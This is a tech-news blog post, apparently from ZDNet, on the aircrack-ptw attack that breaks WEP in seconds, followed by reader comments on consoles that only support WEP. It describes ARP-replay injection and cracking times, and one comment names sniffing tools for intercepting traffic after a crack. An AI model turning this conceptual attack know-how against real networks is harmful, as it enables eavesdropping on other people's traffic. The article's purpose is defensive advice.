German researchers put final nail in WEP

German researchers put final nail in WEP

Summary: A group of German cryptographic researchers (Erik Tews, Andrei Pychkine, and Ralf-Philipp Weinmann) at the cryptography and computer algebra group at the technical university Darmstadt in Germany have come up with a new statistical attack against WEP (Wired Equivalent Privacy) that's faster than anything achieved before.

SHARE:
TOPICS: Wi-Fi
50

A group of German cryptographic researchers (Erik Tews, Andrei Pychkine, and Ralf-Philipp Weinmann) at the cryptography and computer algebra group at the technical university Darmstadt in Germany have come up with a new statistical attack against WEP (Wired Equivalent Privacy) that's faster than anything achieved before. Wireless security researcher Jon "Johnny Cache" Ellch was so impressed with the work that he declared, "This is going to be more than an order of magnitude faster than all of the previous statistical attacks." Ellch added that the code weighed in at an "astounding 700 lines of code" and that he couldn't wait to start testing and re-implementing it.

Up until this point, with the KoReK class of attacks being the fastest thing around, I've typically considered WEP 104 (incorrectly known as WEP 128) to be breakable in just over eight minutes on average on an 802.11g network operating at peak 24 mbps sustainable throughput. Under idle network conditions, a passive attack on WEP would be impractical, but an attacker can use ARP replay attacks to induce responses from legitimate hosts to generate data. Using the packet injection ARP replay attack, WEP 104-bit encryption would be broken in about 22 minutes on average.

But with the new aircrack-ptw (Pychkine Tews Weinmann) algorithm, which runs about 20 times faster than the previous class of WEP-cracking algorithms based on the work of hacker "KoReK," WEP can fall in an average of 20 seconds on an 802.11g network and an average of 80 seconds on an 802.11b network if the network is very busy. For an idle network that's being attacked with packet injection, WEP can fall in an average of 52 seconds for 802.11g or 3.5 minutes with 802.11b. But we have to assume the worst, and the cracking can sometimes happen even faster than the average times I listed. What this means is that WEP (even with dynamic key rotation) is officially broken beyond repair.

I had pretty much declared WEP dead more than two years ago, but there was some room left for aggressive dynamic WEP key rotation. Now that WPA and even WPA2 can be automatically deployed within the Windows environment, there really is no excuse to be using WEP anymore. As of this latest round of WEP-cracking with aircrack-ptw, I'm adding WEP to my list of wireless LAN myths as the seventh dumbest way to secure a wireless LAN. It's still at the bottom of the list because WEP at least still takes a little bit of work to crack, whereas it takes ZERO effort to crack MAC filtering, SSID hiding, and DHCP disabling.

Businesses can follow my ultimate enterprise wireless LAN security guide. Home users need to implement WPA-PSK with a simple random 10-character (or more) alphanumeric password. For those of you who own a Nintendo DS system, you may be tempted to downgrade your security to WEP to accommodate your WPA-incapable Nintendo DS. But you've been warned how dangerous it is to run WEP. When the Sony PSP came out with WEP-only support, I slammed them for it, and it got a lot of attention within the PSP community. A year after I slammed Sony for not putting in real wireless LAN security, it updated the PSP with a newer firmware that did support WPA security. The time has come for the Nintendo community to band together and demand a fix from Nintendo. There are also some other consumer electronics devices that support WEP only, and you'll need to complain to them as well to get a fix.

[poll id=22]

.

Topic: Wi-Fi

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

50 comments
Log in or register to join the discussion
  • Speaking of Sony and wireless technology

    I know a couple of people with PS3s that are using them wirelessly on home LANs.

    Without exception they have had to disable WPA on their Access Points because the PS3 simply refuse to connect with it on.

    Which surprises me a little as my PSP connects to my WPA wireless absolutely fine.

    Perhaps this is an issue you could investigate George? It would be nice if you could get the same level of response as with the PSP.
    nmh
    • Let me check in to that

      I think we have a test PS3. We'll check it for WPA compliance.
      georgeou
      • If it helps

        I know one of the problematic installations is using a linksys 802.11b wireless acces point. It may simply be a compatibility issue, but it does work fine with the other four pcs using the same access point.
        nmh
  • Nintendo made the move on the Wii, don't be so quick to judge George

    The Wii supports WEP, WPA-PSK (TKIP), WPA-PSK (AES), and WPA2-PSK (AES).

    Remember, the DS came out in November 2004 when most people hadn't even heard of WPA outside of corporate circles (not exactly the DS's projected market!). WEP was the [i]protocol de jour[/i] back then.
    Scrat
    • WPA was widely available back then

      WPA was widely available back then and there are newer versions of the DS still being sold. The need to PATCH it.
      georgeou
      • DS Lite came out in 2006

        I often get questions from employees asking about wireless security--and BY FAR the most common reason they say they need WEP is for a Nintendo DS.

        OK, I'd give them a little slack for their 2004 release--they certainly weren't the only ones who hadn't adopted WPA (but it WAS well known). The one that really bothers me is the DS Lite--which was released in 2006, and STILL didn't (and still doesn't) support anything beyond WEP.

        I don't dare recommend the unsupported hack, but there is such a thing for the DS, so that it will support WPA. Here's a link:
        http://geekboy.ca/wifi/?cat=2
        MarvinK
        • Thank you for the link

          Thank you for the link and the extra info.
          georgeou
  • Can you please stop the...

    ...absurdity of constantly referring to Jon Ellch as Jon "Johnny Cache" Ellch?

    I mean really, that's pretty ridiculous isn't it?
    pileofmonkeycrap
    • That's the name he goes by.

      That's the name he goes by. I suppose I can start doing Jon Ellch or Johnny Cache. I'll ask him which he prefers.
      georgeou
    • Ha! Thats funny! Ha! Ha!

      In case any readers didnt notice, this poster calls himself 'pileofmonkeycrap'. His real name is probably Jim or Philbert or something like that but he likes 'pileofmonkeycrap" so I guess he is just jokeing about there being a problem with
      referring to Jon Ellch as Jon "Johnny Cache" Ellch.
      Cayble
  • A question about the DS

    What if you had a dedicated WEP router that was used ONLY for using the DS with one or more friends using the same router, and kept the WAN port unplugged? Would that work in the interim, or are DS's hackable? (I don't own a DS simply because of this problem, however I do have a spare router I could use if I knew this would alleviate the problem.) Obviously your capabilities would be limited because you couldn't connect to the internet, but if all you want to do is play with your friends wouldn't this work?
    Michael Kelly
    • Not many people will set up a DMZ for their DS

      http://articles.techrepublic.com.com/5100-1035-6112367.html
      You can follow this guide to set up a guest wireless LAN that's locked down from the rest of the network and still have Internet access. Problem is that it's a few hundred dollars compared to the cheap $40 router/AP.

      You can try and string something together with a router behind a router for your secure network but that get's kind of sloppy forcing you to do a double NAT on your secure machines.

      We might be able to build something with Open Source but that's still not easy or cheap compared to a cheap $40 router.
      georgeou
  • Like TiVo series 2 and certain adapters...

    "There are also some other consumer electronics devices that support WEP only, and you'll need to complain to them as well to get a fix."

    C'mon, TiVo, could you just update the drivers, please?
    mrtuba9
    • Ah, I should have called out Tivo by name

      Ah, I should have called out Tivo by name. I'll look in to it.
      georgeou
    • Tivo does support WPA

      but only on their own WiFi adapter product. I'd be willing to bet that most other non-PC products are the same way.
      Michael Kelly
  • Who has time to hack WEP?

    All these so called "hacks" are pretty outlandish. Usually taking months to complete. OK, so some screw brained idiot does spend months hacking his neighbor. BIG DEAL. It's a crime anyway. Just because you can break a glass window doesn't make it right, does it? This is over-kill on reporting, and, well, just plain STUPID. Where does reality and common-sense meet these days? Not at ZD-NET that's for sure.
    Narg
    • People like you is why we need full disclosure

      Unfortunately, too many people don't take security and confidentiality seriously. People like you is why we need full disclosure because without it; people believe the threat is theoretical.
      georgeou
    • Stupid until you get pwned

      On that fine day you'll see things in a different light, once you get done wiping the egg from your face. People that assume these things will - or could - never happen to them always seem to be among the inevitable victims. Is it any wonder why?
      klumper
    • Have you heard of a court-ordered wire tap?

      At the point of cracking WEP, all one need do is allow TCP forwarding and ARP with a suitable sniffer in promiscuous mode, e.g., ethereal or dsniff or aircrack.

      What I find amazing is how many still set up their wireless routers with no encryption at all!

      OK George, I've got myself set up with WPA-2 PSK and MAC filtered.

      Is that sufficient?
      D T Schmitz
      • WPA2 or even WPA is enough, don't need MAC filtering

        WPA2 or even WPA is enough, don't need MAC filtering. WEP is still much harder to crack than MAC. There's nothing to be cracked for MAC filtering, MAC addresses are sent in the clear in the header of every single Ethernet frame.
        georgeou